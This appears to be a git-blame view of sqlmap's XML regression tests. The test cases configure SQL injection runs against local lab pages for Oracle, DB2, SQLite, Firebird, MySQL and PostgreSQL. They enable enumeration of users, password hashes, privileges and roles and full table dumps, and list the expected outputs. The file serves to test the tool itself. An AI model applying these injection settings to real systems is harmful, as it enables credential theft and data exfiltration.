<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
2013-01-16 19:13:47 +04:00
<db value= "sys" />
2013-01-14 21:30:42 +04:00
<tbl value= "users" />
<answers value= "do you want to perform a dictionary-based attack against retrieved password hashes=N" />
</switches>
<parse >
<item value= "Title: Generic UNION query (NULL) - 3 columns" />
<item value= "r'back-end DBMS: active fingerprint: Oracle 10g'" />
2013-01-16 03:59:29 +04:00
<item value= "banner: 'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'" />
2013-01-14 21:30:42 +04:00
<item value= "current user: 'SYS'" />
<item value= "current schema (equivalent to database on Oracle): 'SYS'" />
<item value= "hostname: 'debian" />
<item value= "current user is DBA: True" />
2013-01-18 03:17:33 +04:00
<item value= "r'database management system users \[.+ANONYMOUS.+SYS.+XDB'" />
2013-01-16 19:00:45 +04:00
<item value= "r'database management system users password hashes:.+CTXSYS \[.+password hash: D1D21CA56994CAB6.+DBSNMP \[.+password hash: E066D214D5421CCC.+SYS \[.+password hash: 2D5A0C491B634F1B'" />
2013-01-16 19:13:47 +04:00
<item value= "r'database management system users privileges:.+CTXSYS.+ALTER SESSION.+ SYS .+ALTER ANY EVALUATION CONTEXT'" />
<item value= "r'database management system users roles:.+MDSYS.+CONNECT.+SYS \(administrator\).+DBA.+XDBADMIN'" />
<item value= "r'available databases \[.+CTXSYS.+MDSYS.+SYSTEM'" />
2013-01-16 19:16:18 +04:00
<item value= "r'Database: SYS.+ tables.+USERS'" />
2013-01-16 19:13:47 +04:00
<item value= "r'Database: SYS.+Table: USERS.+3 columns.+SURNAME.+VARCHAR2'" />
<item value= "r'Database: SYS.+Table.+Entries.+USERS.+5'" />
<item value= "r'Database: SYS.+Table: USERS.+5 entries.+luther.+nameisnull.+'" />
2013-01-14 21:30:42 +04:00
</parse>
</case>
<case name= "Oracle partial UNION query multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int_partialunion.php?id=1" />
<threads value= "4" />
<tech value= "U" />
2013-01-18 03:17:33 +04:00
<dbms value= "Oracle" />
2013-01-14 21:30:42 +04:00
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
2013-01-16 19:13:47 +04:00
<db value= "sys" />
2013-01-14 21:30:42 +04:00
<tbl value= "users" />
<answers value= "do you want to perform a dictionary-based attack against retrieved password hashes=N" />
</switches>
<parse >
<item value= "Title: Generic UNION query (NULL) - 3 columns" />
<item value= "r'back-end DBMS: active fingerprint: Oracle 10g'" />
2013-01-16 03:59:29 +04:00
<item value= "banner: 'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'" />
2013-01-14 21:30:42 +04:00
<item value= "current user: 'SYS'" />
<item value= "current schema (equivalent to database on Oracle): 'SYS'" />
<item value= "hostname: 'debian" />
<item value= "current user is DBA: True" />
2013-01-18 03:17:33 +04:00
<item value= "r'database management system users \[.+ANONYMOUS.+SYS.+XDB'" />
2013-01-16 19:00:45 +04:00
<item value= "r'database management system users password hashes:.+CTXSYS \[.+password hash: D1D21CA56994CAB6.+DBSNMP \[.+password hash: E066D214D5421CCC.+SYS \[.+password hash: 2D5A0C491B634F1B'" />
2013-01-16 19:13:47 +04:00
<item value= "r'database management system users privileges:.+CTXSYS.+ALTER SESSION.+ SYS .+ALTER ANY EVALUATION CONTEXT'" />
<item value= "r'database management system users roles:.+MDSYS.+CONNECT.+SYS \(administrator\).+DBA.+XDBADMIN'" />
<item value= "r'available databases \[.+CTXSYS.+MDSYS.+SYSTEM'" />
2013-01-16 19:16:18 +04:00
<item value= "r'Database: SYS.+ tables.+USERS'" />
2013-01-16 19:13:47 +04:00
<item value= "r'Database: SYS.+Table: USERS.+3 columns.+SURNAME.+VARCHAR2'" />
<item value= "r'Database: SYS.+Table.+Entries.+USERS.+5'" />
<item value= "r'Database: SYS.+Table: USERS.+5 entries.+luther.+nameisnull.+'" />
2013-01-14 21:30:42 +04:00
</parse>
</case>
<case name= "Oracle time-based single-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int_nooutput.php?id=1" />
<tech value= "T" />
<timeSec value= "2" />
<getBanner value= "True" />
<isDba value= "True" />
</switches>
<parse >
<item value= "Title: Oracle AND time-based blind" />
2013-01-16 03:59:29 +04:00
<item value= "banner: 'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'" />
2013-01-14 21:30:42 +04:00
<item value= "current user is DBA: True" />
</parse>
</case>
<case name= "Oracle inline queries multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int_inline.php?id=1" />
<threads value= "4" />
<tech value= "Q" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
2013-01-16 19:13:47 +04:00
<db value= "sys" />
2013-01-14 21:30:42 +04:00
<tbl value= "users" />
<answers value= "do you want to perform a dictionary-based attack against retrieved password hashes=N" />
</switches>
<parse >
<item value= "Title: Oracle inline queries" />
<item value= "r'back-end DBMS: active fingerprint: Oracle 10g'" />
2013-01-16 03:59:29 +04:00
<item value= "banner: 'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'" />
2013-01-14 21:30:42 +04:00
<item value= "current user: 'SYS'" />
<item value= "current schema (equivalent to database on Oracle): 'SYS'" />
<item value= "hostname: 'debian" />
<item value= "current user is DBA: True" />
2013-01-18 03:17:33 +04:00
<item value= "r'database management system users \[.+ANONYMOUS.+SYS.+XDB'" />
2013-01-16 19:00:45 +04:00
<item value= "r'database management system users password hashes:.+CTXSYS \[.+password hash: D1D21CA56994CAB6.+DBSNMP \[.+password hash: E066D214D5421CCC.+SYS \[.+password hash: 2D5A0C491B634F1B'" />
2013-01-16 19:13:47 +04:00
<item value= "r'database management system users privileges:.+CTXSYS.+ALTER SESSION.+ SYS .+ALTER ANY EVALUATION CONTEXT'" />
<item value= "r'database management system users roles:.+MDSYS.+CONNECT.+SYS \(administrator\).+DBA.+XDBADMIN'" />
<item value= "r'available databases \[.+CTXSYS.+MDSYS.+SYSTEM'" />
2013-01-16 19:16:18 +04:00
<item value= "r'Database: SYS.+ tables.+USERS'" />
2013-01-16 19:13:47 +04:00
<item value= "r'Database: SYS.+Table: USERS.+3 columns.+SURNAME.+VARCHAR2'" />
<item value= "r'Database: SYS.+Table.+Entries.+USERS.+5'" />
<item value= "r'Database: SYS.+Table: USERS.+5 entries.+luther.+nameisnull.+'" />
2013-01-14 21:30:42 +04:00
</parse>
</case>
2013-01-18 01:58:53 +04:00
<case name= "IBM DB2 boolean-based multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/db2/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<db value= "db2inst1" />
<tbl value= "users" />
<excludeSysDbs value= "True" />
</switches>
<parse >
<item value= "Title: AND boolean-based blind - WHERE or HAVING clause" />
<item value= "r'back-end DBMS: active fingerprint: IBM DB2 9.5'" />
<item value= "banner: 'DB2 v9.5.0.0'" />
<item value= "current user: 'DB2INST1'" />
<item value= "current database: 'TESTDB'" />
<item value= "hostname: 'debian" />
<item value= "current user is DBA: True" />
<item value= "r'database management system users \[.+DB2INST1'" />
<item value= "r'database management system users privileges:.+DB2INST1.+privilege: DB2INST1.USERS.+privilege: SYSTOOLS.POLICY'" />
2013-01-18 13:32:05 +04:00
<item value= "r'database management system users roles:.+DB2INST1.+role: DB2INST1.USERS.+role: SYSTOOLS.POLICY'" />
2013-01-18 01:58:53 +04:00
<item value= "r'available databases \[.+DB2INST1.+SYSIBM.+SYSTOOLS'" />
<item value= "r'Database: DB2INST1.+1 table.+USERS'" />
<item value= "r'Database: DB2INST1.+Table: USERS.+3 columns.+SURNAME.+VARCHAR\(1000\)'" />
<item value= "r'Database: DB2INST1.+Table.+Entries.+USERS.+5'" />
<item value= "r'Database: DB2INST1.+Table: USERS.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
2013-01-14 20:50:24 +04:00
<case name= "SQLite boolean-based multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
<excludeSysDbs value= "True" />
</switches>
<parse >
<item value= "Title: AND boolean-based blind - WHERE or HAVING clause" />
<item value= "r'back-end DBMS: active fingerprint: SQLite 2'" />
<item value= "banner: '2.8.17'" />
<item value= "r'Database: SQLite_masterdb.+1 table.+users'" />
<item value= "r'Database: SQLite_masterdb.+Table: users.+3 columns.+surname.+TEXT'" />
<item value= "r'Database: SQLite_masterdb.+Table: users.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
<case name= "SQLite UNION query multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
<excludeSysDbs value= "True" />
</switches>
<parse >
<item value= "Title: Generic UNION query (NULL) - 3 columns" />
<item value= "r'back-end DBMS: active fingerprint: SQLite 2'" />
<item value= "banner: '2.8.17'" />
<item value= "r'Database: SQLite_masterdb.+1 table.+users'" />
<item value= "r'Database: SQLite_masterdb.+Table: users.+3 columns.+surname.+TEXT'" />
2013-01-21 20:38:31 +04:00
<item value= "r'Database: SQLite_masterdb.+Table: users.+5 entries.+luther.+user agent.+'" />
2013-01-14 20:50:24 +04:00
</parse>
</case>
<case name= "SQLite partial UNION query multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int_partialunion.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
</switches>
<parse >
<item value= "Title: Generic UNION query (NULL) - 3 columns" />
<item value= "r'back-end DBMS: active fingerprint: SQLite 2'" />
<item value= "banner: '2.8.17'" />
<item value= "r'Database: SQLite_masterdb.+1 table.+users'" />
<item value= "r'Database: SQLite_masterdb.+Table: users.+3 columns.+surname.+TEXT'" />
2013-01-21 20:38:31 +04:00
<item value= "r'Database: SQLite_masterdb.+Table: users.+5 entries.+luther.+user agent.+'" />
2013-01-14 20:50:24 +04:00
</parse>
</case>
2013-02-05 13:11:20 +04:00
<case name= "SQLite 3 boolean-based multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int_3.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
<excludeSysDbs value= "True" />
</switches>
<parse >
<item value= "Title: AND boolean-based blind - WHERE or HAVING clause" />
<item value= "r'back-end DBMS: active fingerprint: SQLite 3'" />
<item value= "banner: '3.7.3'" />
<item value= "r'Database: SQLite_masterdb.+1 table.+users'" />
<item value= "r'Database: SQLite_masterdb.+Table: users.+3 columns.+surname.+TEXT'" />
<item value= "r'Database: SQLite_masterdb.+Table: users.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
<case name= "SQLite 3 UNION query multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int_3.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
<excludeSysDbs value= "True" />
</switches>
<parse >
<item value= "Title: Generic UNION query (NULL) - 3 columns" />
<item value= "r'back-end DBMS: active fingerprint: SQLite 3'" />
<item value= "banner: '3.7.3'" />
<item value= "r'Database: SQLite_masterdb.+1 table.+users'" />
<item value= "r'Database: SQLite_masterdb.+Table: users.+3 columns.+surname.+TEXT'" />
<item value= "r'Database: SQLite_masterdb.+Table: users.+5 entries.+luther.+user agent.+'" />
</parse>
</case>
<case name= "SQLite 3 partial UNION query multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int_3_partialunion.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
</switches>
<parse >
<item value= "Title: Generic UNION query (NULL) - 3 columns" />
<item value= "r'back-end DBMS: active fingerprint: SQLite 3'" />
<item value= "banner: '3.7.3'" />
<item value= "r'Database: SQLite_masterdb.+1 table.+users'" />
<item value= "r'Database: SQLite_masterdb.+Table: users.+3 columns.+surname.+TEXT'" />
<item value= "r'Database: SQLite_masterdb.+Table: users.+5 entries.+luther.+user agent.+'" />
</parse>
</case>
2013-01-14 20:50:24 +04:00
<case name= "SQLite 3 time-based single-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int_3_nooutput.php?id=1" />
<tech value= "T" />
2013-02-05 03:26:17 +04:00
<extensiveFp value= "True" />
2013-01-14 20:50:24 +04:00
<level value= "3" />
<risk value= "2" />
<timeSec value= "2" />
<getBanner value= "True" />
</switches>
<parse >
<item value= "Title: SQLite > 2.0 AND time-based blind (heavy query)" />
2013-02-05 03:26:17 +04:00
<item value= "r'back-end DBMS: active fingerprint: SQLite 3'" />
2013-01-14 20:50:24 +04:00
<item value= "banner: '3.7.3'" />
</parse>
</case>
<case name= "SQLite inline queries multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int_inline.php?id=1" />
<threads value= "4" />
<tech value= "Q" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
</switches>
<parse >
<item value= "Title: SQLite inline queries" />
<item value= "r'back-end DBMS: active fingerprint: SQLite 2'" />
<item value= "banner: '2.8.17'" />
<item value= "r'Database: SQLite_masterdb.+1 table.+users'" />
<item value= "r'Database: SQLite_masterdb.+Table: users.+3 columns.+surname.+TEXT'" />
<item value= "r'Database: SQLite_masterdb.+Table: users.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
2013-01-19 03:17:43 +04:00
<case name= "Firebird boolean-based multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/firebird/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<tbl value= "users" />
<excludeSysDbs value= "True" />
</switches>
<parse >
<item value= "Title: AND boolean-based blind - WHERE or HAVING clause" />
2013-01-19 03:32:39 +04:00
<item value= "r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'" />
2013-01-19 03:17:43 +04:00
<item value= "banner: '2.5.0'" />
<item value= "current user: 'SYSDBA'" />
2013-01-19 03:35:16 +04:00
<item value= "r'current database: '/'" />
2013-01-19 03:17:43 +04:00
<item value= "current user is DBA: True" />
<item value= "r'database management system users \[.+PUBLIC.+SYSDBA'" />
<item value= "r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'" />
<item value= "r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'" />
<item value= "r'Database: Firebird_masterdb.+1 table.+USERS'" />
<item value= "r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'" />
<item value= "r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'" />
<item value= "r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
2013-01-21 20:38:31 +04:00
<!-- TODO: this test case fails because of issue #358
2013-01-19 03:17:43 +04:00
<case name= "Firebird error-based multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/firebird/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<tbl value= "users" />
</switches>
<parse >
<item value= "Title: AND boolean-based blind - WHERE or HAVING clause" />
2013-01-19 03:32:39 +04:00
<item value= "r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'" />
2013-01-19 03:17:43 +04:00
<item value= "banner: '2.5.0'" />
<item value= "current user: 'SYSDBA'" />
2013-01-19 03:35:16 +04:00
<item value= "r'current database: '/'" />
2013-01-19 03:17:43 +04:00
<item value= "current user is DBA: True" />
<item value= "r'database management system users \[.+PUBLIC.+SYSDBA'" />
<item value= "r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'" />
<item value= "r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'" />
<item value= "r'Database: Firebird_masterdb.+1 table.+USERS'" />
<item value= "r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'" />
<item value= "r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'" />
<item value= "r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
2013-01-21 20:38:31 +04:00
-->
2013-01-19 03:17:43 +04:00
<case name= "Firebird UNION query multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/firebird/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<tbl value= "users" />
</switches>
<parse >
<item value= "Title: Generic UNION query (NULL) - 3 columns" />
2013-01-19 03:32:39 +04:00
<item value= "r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'" />
2013-01-19 03:17:43 +04:00
<item value= "banner: '2.5.0'" />
<item value= "current user: 'SYSDBA'" />
2013-01-19 03:35:16 +04:00
<item value= "r'current database: '/'" />
2013-01-19 03:17:43 +04:00
<item value= "current user is DBA: True" />
<item value= "r'database management system users \[.+PUBLIC.+SYSDBA'" />
<item value= "r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'" />
<item value= "r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'" />
<item value= "r'Database: Firebird_masterdb.+1 table.+USERS'" />
<item value= "r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'" />
<item value= "r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'" />
<item value= "r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
<case name= "Firebird partial UNION query multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/firebird/get_int_partialunion.php?id=1" />
<threads value= "4" />
<tech value= "U" />
2013-01-24 18:59:55 +04:00
<dbms value= "Firebird" />
2013-01-19 03:17:43 +04:00
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<tbl value= "users" />
</switches>
<parse >
<item value= "Title: Generic UNION query (NULL) - 3 columns" />
2013-01-19 03:32:39 +04:00
<item value= "r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'" />
2013-01-19 03:17:43 +04:00
<item value= "banner: '2.5.0'" />
<item value= "current user: 'SYSDBA'" />
2013-01-19 03:35:16 +04:00
<item value= "r'current database: '/'" />
2013-01-19 03:17:43 +04:00
<item value= "current user is DBA: True" />
<item value= "r'database management system users \[.+PUBLIC.+SYSDBA'" />
<item value= "r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'" />
<item value= "r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'" />
<item value= "r'Database: Firebird_masterdb.+1 table.+USERS'" />
<item value= "r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'" />
<item value= "r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'" />
<item value= "r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
<case name= "Firebird time-based single-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/firebird/get_int_nooutput.php?id=1" />
<tech value= "T" />
<level value= "4" />
<risk value= "2" />
<timeSec value= "2" />
<getBanner value= "True" />
<isDba value= "True" />
</switches>
<parse >
2013-01-19 03:32:39 +04:00
<item value= "Title: Firebird AND time-based blind (heavy query)" />
2013-01-19 03:17:43 +04:00
<item value= "banner: '2.5.0'" />
<item value= "current user is DBA: True" />
</parse>
</case>
<case name= "Firebird inline queries multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/firebird/get_int_inline.php?id=1" />
<threads value= "4" />
<tech value= "Q" />
2013-01-19 04:29:42 +04:00
<level value= "2" />
2013-01-19 03:17:43 +04:00
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<tbl value= "users" />
</switches>
<parse >
<item value= "Title: Firebird inline queries" />
2013-01-19 03:32:39 +04:00
<item value= "r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'" />
2013-01-19 03:17:43 +04:00
<item value= "banner: '2.5.0'" />
<item value= "current user: 'SYSDBA'" />
2013-01-19 03:35:16 +04:00
<item value= "r'current database: '/'" />
2013-01-19 03:17:43 +04:00
<item value= "current user is DBA: True" />
<item value= "r'database management system users \[.+PUBLIC.+SYSDBA'" />
<item value= "r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'" />
<item value= "r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'" />
<item value= "r'Database: Firebird_masterdb.+1 table.+USERS'" />
<item value= "r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'" />
<item value= "r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'" />
<item value= "r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
2012-12-18 19:59:48 +04:00
<!-- End of common enumeration switches across all techniques -->
<!-- Custom enumeration switches -->
<case name= "MySQL error-based multi-threaded custom enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<getSchema value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
<limitStart value= "2" />
<limitStop value= "4" />
<excludeSysDbs value= "True" />
</switches>
<parse >
<item value= "r'Database: testdb.+Table: users.+3 columns.+surname.+varchar\(1000\)'" />
<item value= "r'Database: testdb.+Table: users.+3 entries.+fluffy.+bunny.+wu.+ming'" />
</parse>
</case>
<case name= "MySQL UNION query multi-threaded custom enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<getSchema value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
<limitStart value= "2" />
<limitStop value= "4" />
<excludeSysDbs value= "True" />
</switches>
<parse >
<item value= "r'Database: testdb.+Table: users.+3 columns.+surname.+varchar\(1000\)'" />
<item value= "r'Database: testdb.+Table: users.+3 entries.+fluffy.+bunny.+wu.+ming'" />
</parse>
</case>
<case name= "MySQL boolean-based multi-threaded custom enumeration - substring" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
<firstChar value= "3" />
<lastChar value= "5" />
</switches>
<parse >
2013-01-22 16:34:11 +04:00
<item value= "r'fetching number of entries for table .+retrieving the length of query output\n[\r]*\[.+?\] \[INFO\] retrieved: [\d]+'" console_output= "True" />
2012-12-18 19:59:48 +04:00
<item value= "r'Database: testdb.+Table: users.+5 entries.+the | iss.+<blank> | mei'" />
</parse>
</case>
2013-01-14 05:11:57 +04:00
<case name= "PostgreSQL error-based multi-threaded custom enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<getSchema value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
<limitStart value= "2" />
<limitStop value= "4" />
<excludeSysDbs value= "True" />
</switches>
<parse >
<item value= "r'Database: public.+Table: users.+3 columns.+surname.+bpchar'" />
<item value= "r'Database: public.+Table: users.+3 entries.+fluffy.+bunny.+wu.+ming'" />
</parse>
</case>
<case name= "PostgreSQL UNION query multi-threaded custom enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<getSchema value= "True" />
<dumpTable value= "True" />
